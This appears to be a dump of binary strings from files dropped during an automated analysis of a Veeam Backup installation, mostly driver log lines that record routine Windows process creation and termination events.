Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:01.604] [2028:1f14: 00] DETAIL: VS_PS: process creation: 644, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:39.376] [10a4:14dc: 00] DETAIL: VS_PS: process creation: 8d0, parent = 10a4, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:10:04.463] [9ec:1d00: 00] DETAIL: VS_PS: process termination: 9ec, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.612] [69c:193c: 00] DETAIL: VS_PS: process creation: 1a68, parent = 69c, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.020] [a44:22b8: 00] DETAIL: VS_PS: process termination: a44, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:38.988] [2028:12a8: 00] DETAIL: VS_PS: process creation: 10a4, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:34.164] [2274:2154: 00] DETAIL: VS_PS: process termination: 2274, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:40.545] [2268:1e90: 00] DETAIL: VS_PS: process termination: 2268, image filename: "\Device\HarddiskVolume2\Windows\System32\MoUsoCoreWorker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:54.176] [20d8:938: 00] DETAIL: VS_PS: process termination: 20d8, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:27.295] [16a8:173c: 00] DETAIL: VS_PS: process termination: 16a8, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\mofcomp.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.477] [1a9c:6a4: 00] DETAIL: VS_PS: process termination: 1a9c, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.192] [90c:1730: 00] DETAIL: VS_PS: process termination: 90c, image filename: "\Device\HarddiskVolume2\Windows\System32\SearchFilterHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.100] [c10:588: 00] DETAIL: VS_PS: process creation: f24, parent = c10, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\c0bbd5db-d087-4a99-8f73-9406e734d226".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:29.180] [694:14d0: 00] DETAIL: VS_PS: process termination: 694, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:51.027] [1c14:1f28: 00] DETAIL: VS_PS: process termination: 1c14, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:07.834] [1e00:1844: 00] DETAIL: VS_PS: process creation: f4c, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.980] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1008, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.455] [1b60:c24: 00] DETAIL: VS_PS: process termination: 1b60, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.098] [1950:1110: 00] DETAIL: VS_PS: process termination: 1950, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\02968286-124f-414f-b3c2-008af8b3eec6".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.463] [1e00:1844: 00] DETAIL: VS_PS: process creation: 738, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:47.453] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1b04, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:29.111] [b08:1c88: 00] DETAIL: VS_PS: process termination: b08, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.183] [1db0:14c8: 00] DETAIL: VS_PS: process termination: 1db0, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:10.234] [b68:23f4: 00] DETAIL: VS_PS: process termination: b68, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:51.043] [1528:1ed4: 00] DETAIL: VS_PS: process creation: 1e84, parent = 1528, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.859] [2c0:2148: 00] DETAIL: VS_PS: process creation: 1db0, parent = 2c0, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.922] [1290:103c: 00] DETAIL: VS_PS: process termination: 1290, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.340] [b68:2380: 00] DETAIL: VS_PS: process creation: 1ab4, parent = b68, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:59.314] [1888:20b8: 00] DETAIL: VS_PS: process creation: 1f60, parent = 1888, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:01.921] [608:13e4: 00] DETAIL: VS_PS: process termination: 608, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:33.732] [1e00:1844: 00] DETAIL: VS_PS: process creation: 77c, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.164] [1a8c:14a4: 00] DETAIL: VS_PS: process termination: 1a8c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:13:04.337] [1fd4:a58: 00] DETAIL: VS_PS: process termination: 1fd4, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:56.685] [1e00:1844: 00] DETAIL: VS_PS: process creation: 23ec, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:08:58.515] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1748, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.522] [340:20d4: 00] DETAIL: VS_PS: process creation: 614, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:35.797] [188:448: 00] DETAIL: VS_PS: process creation: 16b4, parent = 188, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:01.031] [df4:1be0: 00] DETAIL: VS_PS: process termination: df4, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.389] [1e64:46c: 00] DETAIL: VS_PS: process creation: 1ca0, parent = 1e64, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Veeam\Backup Transport\GuestInteraction\VSS\VeeamGuestHelperCtrl.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:08:24.000] [15fc:b8c: 00] DETAIL: VS_PS: process termination: 15fc, image filename: "\Device\HarddiskVolume2\Windows\System32\SearchProtocolHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.323] [2028:1d04: 00] DETAIL: VS_PS: process creation: 1384, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.848] [1e64:15d4: 00] DETAIL: VS_PS: process creation: 2364, parent = 1e64, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:01.808] [1550:182c: 00] DETAIL: VS_PS: process termination: 1550, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.779] [450:fbc: 00] DETAIL: VS_PS: process creation: 374, parent = 450, image filename: "\Device\HarddiskVolume2\Program Files\Common Files\Veeam\Backup and Replication\Mount Service\Veeam.Backup.MountService.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.556] [2c0:2148: 00] DETAIL: VS_PS: process creation: 69c, parent = 2c0, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.421] [1ca0:f80: 00] DETAIL: VS_PS: process termination: 1ca0, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Veeam\Backup Transport\GuestInteraction\VSS\VeeamGuestHelperCtrl.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.345] [1384:bfc: 00] DETAIL: VS_PS: process termination: 1384, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:58.989] [340:35c: 00] DETAIL: VS_PS: process creation: 2020, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\WmiPrvSE.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:29.103] [1c80:1020: 00] DETAIL: VS_PS: process termination: 1c80, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:10:04.416] [1e00:1844: 00] DETAIL: VS_PS: process creation: 9ec, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:38.930] [2028:12a8: 00] DETAIL: VS_PS: process creation: 764, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:29.016] [b08:1c88: 00] DETAIL: VS_PS: process creation: 984, parent = b08, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:57.348] [340:35c: 00] DETAIL: VS_PS: process creation: 9dc, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\vdsldr.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:52:05.675] [340:20d4: 00] DETAIL: VS_PS: process creation: 10ac, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\MoUsoCoreWorker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:52:42.863] [6cc:22c4: 00] DETAIL: VS_PS: process termination: 6cc, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:10.234] [1460:1854: 00] DETAIL: VS_PS: process termination: 1460, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:51.119] [1e84:1a3c: 00] DETAIL: VS_PS: process termination: 1e84, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.783] [374:ae8: 00] DETAIL: VS_PS: process creation: 1094, parent = 374, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:11:06.351] [1aa4:21e0: 00] DETAIL: VS_PS: process termination: 1aa4, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:04.416] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1170, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.296] [1984:10b8: 00] DETAIL: VS_PS: process termination: 1984, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:50.933] [16c0:12cc: 00] DETAIL: VS_PS: process termination: 16c0, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.122] [c10:588: 00] DETAIL: VS_PS: process creation: 16c4, parent = c10, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\c0bbd5db-d087-4a99-8f73-9406e734d226".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:40.903] [8bc:1490: 00] DETAIL: VS_PS: process termination: 8bc, image filename: "\Device\HarddiskVolume2\Windows\System32\RuntimeBroker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:57.189] [12e0:1a64: 00] DETAIL: VS_PS: process termination: 12e0, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.889] [2364:1798: 00] DETAIL: VS_PS: process creation: 167c, parent = 2364, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:08.628] [738:1e9c: 00] DETAIL: VS_PS: process termination: 738, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:49.152] [10a4:c64: 00] DETAIL: VS_PS: process termination: 10a4, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:56.413] [1e00:1844: 00] DETAIL: VS_PS: process creation: 9e8, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:35.961] [2c0:e98: 00] DETAIL: VS_PS: process creation: f04, parent = 2c0, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:06.338] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1730, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:07:41.502] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1984, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:46.730] [340:fd4: 00] DETAIL: VS_PS: process creation: 1a1c, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\backgroundTaskHost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:37.490] [340:23c0: 00] DETAIL: VS_PS: process creation: 2220, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\wbem\WmiPrvSE.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:07:56.631] [17d0:1e40: 00] DETAIL: VS_PS: process termination: 17d0, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:50.925] [1528:1ea8: 00] DETAIL: VS_PS: process creation: 1c14, parent = 1528, image filename: "\Device\HarddiskVolume2\Windows\System32\rundll32.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:56.873] [1aa4:2334: 00] DETAIL: VS_PS: process creation: df4, parent = 1aa4, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.480] [2c0:2148: 00] DETAIL: VS_PS: process creation: a0c, parent = 2c0, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:29.538] [c7c:1684: 00] DETAIL: VS_PS: process termination: c7c, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:46.608] [340:370: 00] DETAIL: VS_PS: process creation: 20d8, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.727] [1ba4:9c0: 00] DETAIL: VS_PS: process termination: 1ba4, image filename: "\Device\HarddiskVolume2\Program Files (x86)\Veeam\Backup Transport\GuestInteraction\VSS\VeeamPSDirectCtrl_X64.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:55:57.993] [1e00:1844: 00] DETAIL: VS_PS: process creation: ea0, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:24.215] [684:99c: 00] DETAIL: VS_PS: process termination: 684, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Veeam.Backup.Model.dll.1.dr	Binary string: PartitionInfo]\\?\GLOBALROOT\Device\Harddisk{0}\Partition{1}
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:46.601] [2b8:176c: 00] DETAIL: VS_PS: process creation: 1bb0, parent = 2b8, image filename: "\Device\HarddiskVolume2\Windows\System32\svchost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.187] [4c8:1698: 00] DETAIL: VS_PS: process termination: 4c8, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.326] [1c80:14ec: 00] DETAIL: VS_PS: process termination: 1c80, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:05.824] [1558:10e0: 00] DETAIL: VS_PS: process termination: 1558, image filename: "\Device\HarddiskVolume2\Program Files\Common Files\Veeam\Backup and Replication\Mount Service\Veeam.Backup.MountService.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:01.035] [145c:215c: 00] DETAIL: VS_PS: process termination: 145c, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:41.484] [340:370: 00] DETAIL: VS_PS: process creation: 23ac, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:07.057] [220c:1084: 00] DETAIL: VS_PS: process termination: 220c, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\02968286-124f-414f-b3c2-008af8b3eec6".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:29.570] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1434, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:07.094] [14f0:22c8: 00] DETAIL: VS_PS: process termination: 14f0, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:31.384] [1aa4:1c44: 00] DETAIL: VS_PS: process creation: 102c, parent = 1aa4, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:49:37.187] [340:23c0: 00] DETAIL: VS_PS: process creation: 1620, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\RuntimeBroker.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:55:01.746] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1f1c, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.028] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1f58, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:09.347] [1ab4:ea8: 00] DETAIL: VS_PS: process creation: 2274, parent = 1ab4, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:01.041] [c60:1928: 00] DETAIL: VS_PS: process termination: c60, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.208] [1674:3f4: 00] DETAIL: VS_PS: process termination: 1674, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:56:03.602] [1e00:1844: 00] DETAIL: VS_PS: process creation: 22b8, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:51:35.380] [1674:a68: 00] DETAIL: VS_PS: process termination: 1674, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.077] [c10:588: 00] DETAIL: VS_PS: process creation: ce0, parent = c10, image filename: "\Device\HarddiskVolume2\ProgramData\Veeam\Setup\Temp\e27b42e7-25a7-4bc6-ad11-70160686386c".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:29.288] [2028:18c8: 00] DETAIL: VS_PS: process creation: 1950, parent = 2028, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:57.290] [c60:1a24: 00] DETAIL: VS_PS: process creation: 1a74, parent = c60, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:52.967] [340:b6c: 00] DETAIL: VS_PS: process creation: 170c, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:12:45.663] [340:1ef0: 00] DETAIL: VS_PS: process creation: 1dd4, parent = 340, image filename: "\Device\HarddiskVolume2\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:33.460] [1e40:22e4: 00] DETAIL: VS_PS: process termination: 1e40, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:06:10.811] [12b4:1e98: 00] DETAIL: VS_PS: process termination: 12b4, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:29.116] [984:1f08: 00] DETAIL: VS_PS: process termination: 984, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:56.507] [1e00:1844: 00] DETAIL: VS_PS: process creation: 1590, parent = 1e00, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:27.612] [18e4:f4c: 00] DETAIL: VS_PS: process termination: 18e4, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:37.488] [1950:1904: 00] DETAIL: VS_PS: process termination: 1950, image filename: "\Device\HarddiskVolume2\Windows\System32\msiexec.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:47:32.556] [1aac:1b58: 00] DETAIL: VS_PS: process creation: cc4, parent = 1aac, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:59.424] [1888:20b8: 00] DETAIL: VS_PS: process termination: 1888, image filename: "\Device\HarddiskVolume2\Windows\SysWOW64\diskpart.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:56:43.736] [2244:2118: 00] DETAIL: VS_PS: process creation: c5c, parent = 2244, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:56.580] [1590:84c: 00] DETAIL: VS_PS: process termination: 1590, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:04.453] [1170:1be4: 00] DETAIL: VS_PS: process termination: 1170, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:24.208] [55c:1f08: 00] DETAIL: VS_PS: process termination: 55c, image filename: "\Device\HarddiskVolume2\Program Files\Common Files\Veeam\Backup and Replication\Mount Service\Veeam.Backup.MountService.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:50:33.951] [1c44:102c: 00] DETAIL: VS_PS: process termination: 1c44, image filename: "\Device\HarddiskVolume2\Program Files\PostgreSQL\15\bin\postgres.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 12:46:27.299] [1c3c:504: 00] DETAIL: VS_PS: process termination: 1c3c, image filename: "\Device\HarddiskVolume2\Windows\System32\conhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:13.644] [1ba8:59c: 00] DETAIL: VS_PS: process termination: 1ba8, image filename: "\Device\HarddiskVolume2\Windows\System32\dllhost.exe".
Source: Driver.VeeamFLR.log.1.dr	Binary string: [24.12.2023 13:05:26.657] [1e64:15d4: 00] DETAIL: VS_PS: process creation: 1454, parent = 1e64, image filename: "\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe".
